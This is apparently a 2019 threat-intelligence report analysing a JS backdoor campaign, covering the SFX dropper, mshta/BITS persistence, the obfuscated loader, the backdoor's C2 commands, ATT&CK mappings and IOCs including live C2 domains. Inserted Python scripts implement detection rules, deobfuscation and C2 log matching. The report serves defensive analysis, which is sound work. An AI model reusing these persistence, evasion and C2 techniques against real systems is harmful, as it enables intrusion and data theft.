CyberThreatIntel/Israel/APT/Unknown/26-08-19/Malware analysis 26-08-19.md
2019-09-04 18:11:37 +02:00


Malware analysis about unknown Israel APT campaign


Malware analysis

Initial vector

The initial vector is an SFX executable that drops a LNK file for the persistence, a VBS file, and a DOCX file used as a decoy for the victim.

[screenshot]

We can also note the multiple possibilities offered by the SFX options for pushing the persistence.

[screenshot]

This executes the VBS file, which pushes the persistence into the Startup menu, hides it by changing its attributes, and launches the persistence (the LNK file).

[screenshot]

This downloads the VB script and executes it through an mshta call.

[screenshot]

In the VB code, we can observe that it uses the BITS functionality to download, through a BITS job, the JS script to execute on the victim. Secondly, it checks the architecture of the system, executes wscript from the matching path, and pushes the window off-screen.
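As an added example (not part of the original analysis), the following Python script applies detection logic for the chain described above to a few constructed process-creation events with Sysmon-style fields: mshta.exe launched with a remote URL, and a script host (wscript.exe/cscript.exe) running a script placed in the Startup folder. The host paths and the URL are constructed for the illustration; only the file name ss.vbs is taken from the IOC list of this report.

```python
"""Detection logic for the initial-vector chain described above.

Added example, not part of the original analysis. It walks a constructed list
of process-creation events (Sysmon-style fields built inline) and flags the two
behaviours the report describes: mshta.exe launched with a remote URL, and
wscript.exe/cscript.exe running a script placed in the Startup folder.
All paths and URLs below are constructed for the illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


# Constructed sample events (hypothetical host, not data from the report)
SAMPLE_EVENTS = [
    # SFX-dropped LNK runs mshta with a remote script URL (T1170)
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://stage.example.invalid/hw",
              r"C:\Users\victim\Downloads\news.exe"),
    # persistence: script host started from the Startup folder (T1060)
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe",
              r'wscript.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows'
              r'\Start Menu\Programs\Startup\ss.vbs"',
              r"C:\Windows\explorer.exe"),
    # benign: mshta with a local .hta, no URL
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\setup.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe",
              r"C:\Windows\explorer.exe"),
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def classify(ev):
    """Return the list of detection names that fire for one event."""
    name = ev.image.rsplit("\\", 1)[-1].lower()
    findings = []
    if name == "mshta.exe" and URL_RE.search(ev.cmdline):
        findings.append("mshta_remote_url")
    if name in SCRIPT_HOSTS and STARTUP_RE.search(ev.cmdline):
        findings.append("script_host_from_startup")
    return findings


def scan(events):
    """Return (image, detection) pairs for every event that triggers a rule."""
    return [(ev.image, f) for ev in events for f in classify(ev)]


if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"{finding:28s} {image}")
```

The benign local .hta event is included on purpose: matching on mshta.exe alone would be noisy, so the rule requires a remote URL in the command line, which is what this chain actually does.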

Loader

We can see that it uses a function to decode the commands from an array of bytes.

[screenshot]

To decode the strings, we reuse the function that the backdoor itself uses to decode the commands.

[screenshot]

The encoded commands can now be replaced by their decoded values.

[screenshot]

Once the encoded strings are replaced, we have the following code:

[screenshot]

As an anti-forensic method, a function is present that determines whether a debugger is attached.

[screenshot]

Finally, we can observe a WScript execution through a function `splter`, which splits the string to get an array of bytes, converts it to ASCII, and then runs the script with an `execute` call.
With the following PowerShell script, we can extract the second layer, which is the JS backdoor.

[screenshot]
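As an added example (not the author's PowerShell script), the following Python code reproduces the decoding step described in the Loader section: split an encoded literal into an array of byte values, convert it to ASCII, and substitute the decoded value back into the script text. The delimiter (`,`), the decimal encoding of the byte values and the sample script text are assumptions made for this illustration, since the decode function is only shown in the screenshots.

```python
"""Decode byte-array-encoded strings of the kind described above.

Added example, not the author's PowerShell script. The report says the loader
splits a string into an array of bytes and converts it to ASCII before calling
execute. The delimiter ("," here), the decimal encoding and the sample script
text are assumptions made for this illustration.
"""
import re

DELIM = ","  # assumed delimiter used by the splitter function


def decode_bytes(encoded, delim=DELIM):
    """Split an encoded string on delim and map each numeric token to a character."""
    out = []
    for tok in encoded.split(delim):
        tok = tok.strip()
        if not tok:
            continue            # tolerate a trailing delimiter
        val = int(tok)
        if not 0 <= val < 256:
            raise ValueError(f"not a byte value: {tok}")
        out.append(chr(val))
    return "".join(out)


# A quoted literal made only of comma-delimited decimal numbers (assumed form)
ENCODED_LITERAL = re.compile(r'"((?:\d{1,3},)+\d{1,3},?)"')


def deobfuscate(script):
    """Replace every encoded literal in the script by its decoded, quoted value."""
    def repl(match):
        decoded = decode_bytes(match.group(1)).replace('"', '""')
        return '"' + decoded + '"'
    return ENCODED_LITERAL.sub(repl, script)


# Constructed sample in the assumed obfuscated form (not the real loader)
SAMPLE = 'x = "119,115,99,114,105,112,116"\ny = "105,115,45,114,101,97,100,121"'

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Running the deobfuscation over the whole script, rather than decoding literals one at a time, is what makes the "replace the encoded commands" step above repeatable on a new sample that uses the same scheme.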

JS Backdoor

Firstly, the script gets the system information of the victim and sends it to one of the C2 servers, taken from the list in order (not a random pick from the list), with the suffix "/is-ready". The backdoor uses a while loop to stay in communication with the C2 by sending pulses carrying the system information of the victim.

[screenshot]

This sends the data to the C2 with the following structure (here from the Any.Run sandbox):

C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional <|>plus<|>nan-av<|>

We can note that the USB spreading option isn't used in this sample. The structure of the message sent to the C2 is the following:

[volumeserialnumber]<|>[computername]<|>[username]<|>plus<|>[AV product (yes -> name or no ->nan-av)]<|>[usbspreading option (= "")]<|>

Secondly, when a response from the C2 is received, a switch structure is used to execute the command.

[screenshot]

Now, we analyse all the functions used by this switch. The first function is used by the other functions of the script to send data to the C2.

[screenshot]

Next, we can observe a group of functions that use WQL queries through WMI to get the system information; this is used by the attacker to profile the victim.

[screenshot]

Then, a function is used by the attacker to download an executable file.

[screenshot]

In the same spirit, a function that reads the bytes of a file into a buffer and sends it to the C2 is present.

[screenshot]

The next function gives the attacker the list of drives on the computer.

[screenshot]

Another function enumerates the paths of folders and files and additionally returns their attributes.

[screenshot]

A third function is used to get the list of processes running on the computer.

[screenshot]

The last function exits the process with a kill signal through a taskkill call.

[screenshot]

We can summarise the list of commands of the backdoor:

| Command | Description |
|---|---|
| execute | Execute a DOS/PowerShell command |
| send | Download a file to execute |
| site-send | Function doesn't exist but has the same argument as the send command; seems to be an edited version of the site-send function that was not deleted? |
| recv | Read a file, put it in a buffer and send it to the C2 |
| enum-driver | Send the list of drives to the C2 |
| enum-faf | Get the list of folders, files and attributes and send it to the C2 |
| enum-process | Get the list of processes (name, id, path of the executable) and send it to the C2 |
| delete | Function doesn't exist but, from the params, seems to give the attacker the ability to delete folders or files |
| exit-process | Kill the backdoor process but can't remove the persistence; an "execute" command must be performed beforehand to delete it in the registry |
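As an added example (not the author's code), the following Python script parses the "<|>"-delimited registration message shown in the JS Backdoor section and maps the "/is-&lt;command&gt;" URI suffixes to the commands of the table above, then runs that mapping over a few constructed proxy log lines. The field separator and URI suffixes come from this report; the field order is read from the sandbox sample quoted above (which carries an OS string that the structure line does not list), and the proxy log format is an assumption.

```python
"""Parse the backdoor's registration message and classify its C2 URIs.

Added example, not the author's code. The "<|>" field separator and the
"/is-<command>" URI suffixes come from the report; the field order below is
read from the sandbox sample quoted in the report (which carries an OS string
that the report's structure line does not list), and the proxy log format is
assumed.
"""
from urllib.parse import urlsplit

FIELD_SEP = "<|>"
FIELDS = ("volume_serial", "computer_name", "user_name", "os",
          "plus", "av_product", "usb_spreading")


def parse_registration(msg):
    """Split the '<|>'-delimited beacon into a dict; raise on a malformed message."""
    parts = msg.split(FIELD_SEP)
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    rec = {k: v.strip() for k, v in zip(FIELDS, parts)}
    if rec["plus"] != "plus":
        raise ValueError("missing 'plus' marker")
    # "nan-av" means no AV product was found; an empty last field means no USB spreading
    rec["av_product"] = None if rec["av_product"] == "nan-av" else rec["av_product"]
    rec["usb_spreading"] = rec["usb_spreading"] != ""
    return rec


# URI suffix -> backdoor action: /is-ready is the initial beacon,
# the others correspond to the commands of the report's table
URI_COMMANDS = {
    "/is-ready": "register",
    "/is-sending": "send",
    "/is-recving": "recv",
    "/is-enum-driver": "enum-driver",
    "/is-enum-faf": "enum-faf",
    "/is-enum-process": "enum-process",
}


def classify_uri(url):
    """Return (host, port, command) if the URL path is a known C2 suffix, else None."""
    u = urlsplit(url)
    cmd = URI_COMMANDS.get(u.path)
    return None if cmd is None else (u.hostname, u.port, cmd)


# Constructed proxy log lines: "<client-ip> <method> <url>" (format assumed)
SAMPLE_LOG = """\
10.0.0.7 POST http://mmksba.dyndns.org:4455/is-ready
10.0.0.7 POST http://webhoptest.webhop.info:4433/is-enum-process
10.0.0.9 GET http://www.example.com/index.html
10.0.0.7 POST http://mmksba.simple-url.com:4422/is-recving
"""


def scan_log(text):
    """Return (client, host, port, command) for each line hitting a known C2 path."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _method, url = line.split(maxsplit=2)
        info = classify_uri(url)
        if info is not None:
            hits.append((client,) + info)
    return hits


if __name__ == "__main__":
    sample = ("C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional "
              "<|>plus<|>nan-av<|>")
    print(parse_registration(sample))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Matching on the full URI path rather than on the domain alone means the detection keeps working if the operators move the same backdoor to a new host, which the three rotating C2 names in the IOC list suggest they do.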

Cyber kill chain

The process graph summarises the cyber kill chain used by the attacker.

[screenshot]

Cyber Threat Intel

References MITRE ATT&CK Matrix

List of all the references with MITRE ATT&CK Matrix
| Enterprise tactics | Techniques used | Ref URL |
|---|---|---|
| Execution | T1170 - Mshta | https://attack.mitre.org/techniques/T1170 |
| Execution | T1064 - Scripting | https://attack.mitre.org/techniques/T1064 |
| Persistence | T1197 - BITS Jobs | https://attack.mitre.org/techniques/T1197 |
| Persistence | T1060 - Registry Run Keys / Startup Folder | https://attack.mitre.org/techniques/T1060 |
| Defense Evasion | T1197 - BITS Jobs | https://attack.mitre.org/techniques/T1197 |
| Defense Evasion | T1170 - Mshta | https://attack.mitre.org/techniques/T1170 |
| Defense Evasion | T1064 - Scripting | https://attack.mitre.org/techniques/T1064 |
| Discovery | T1012 - Query Registry | https://attack.mitre.org/techniques/T1012 |
| Lateral Movement | T1105 - Remote File Copy | https://attack.mitre.org/techniques/T1105 |
| C2 | T1105 - Remote File Copy | https://attack.mitre.org/techniques/T1105 |

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)
| Indicator | Description |
|---|---|
| فضيحة جديدة لأحد قيادات حماس.exe | 03d82852bbb28d1740e50206e7726c006b9b984a8309e2f203e65a67d7d3bcad |
| History.lnk | 3853e0bf00d6dbfc574bc0564f0c90b93a66d644dd4dc8b8c00564f0b6edf581 |
| ss.vbs | 2e5f9bb1cef985eab15ad8d9072e51c71be2810fea789836b401b96bc898943b |
| news.docx | 08fa35e25f4c7a6279a84b337d541989498d74f2c5e84cc4039d667fedc725c7 |
| xyx.jse | 32e216942f995f285947c7e7ee8cf438440c8a1e033bb27517f5e5361dafa8e8 |
| JS Backdoor | 32e216942f995f285947c7e7ee8cf438440c8a1e033bb27517f5e5361dafa8e8 |
| adamnews.for.ug | Domain requested |
| israanews.zz.com.ve | Domain requested |
| mmksba.dyndns.org | Domain C2 |
| webhoptest.webhop.info | Domain C2 |
| mmksba.simple-url.com | Domain C2 |
| 85.17.26.65 | IP requested |
| 66.154.103.156 | IP C2 |
| 37.48.111.5 | IP C2 |
| http[:]//israanews.zz.com.ve/hw.zip.zip | HTTP/HTTPS requests |
| http[:]//adamnews.for.ug/hwdownhww | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-ready | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-ready | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-ready | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-sending | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-sending | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-sending | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-recving | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-recving | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-recving | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-enum-driver | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-enum-driver | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-enum-driver | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-enum-faf | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-enum-faf | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-enum-faf | HTTP/HTTPS requests |
| http[:]//webhoptest.webhop.info:4433/is-enum-process | HTTP/HTTPS requests |
| http[:]//mmksba.simple-url.com:4422/is-enum-process | HTTP/HTTPS requests |
| http[:]//mmksba.dyndns.org:4455/is-enum-process | HTTP/HTTPS requests |

This can be exported in JSON format: Export in JSON
Original tweet: https://twitter.com/Timele9527/status/1166188375109296128
Documents: